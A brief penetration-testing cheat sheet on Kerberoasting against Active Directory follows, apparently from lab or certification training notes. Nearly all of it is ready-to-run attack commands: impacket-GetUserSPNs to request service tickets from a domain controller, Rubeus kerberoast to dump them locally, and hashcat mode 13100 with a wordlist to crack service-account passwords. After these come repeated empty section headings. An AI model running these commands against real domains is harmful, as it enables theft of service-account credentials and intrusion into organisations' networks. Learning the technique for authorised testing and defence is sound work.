Kerberoasting

The client requests a service ticket which is then generated by the domain controller. If we can crack this ticket we get the password of the service account.

Remote

Credentials are needed. Kerberoasting

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete

Local

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Cracking

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt

Remote​

Local​

Cracking​

Remote

Local

Cracking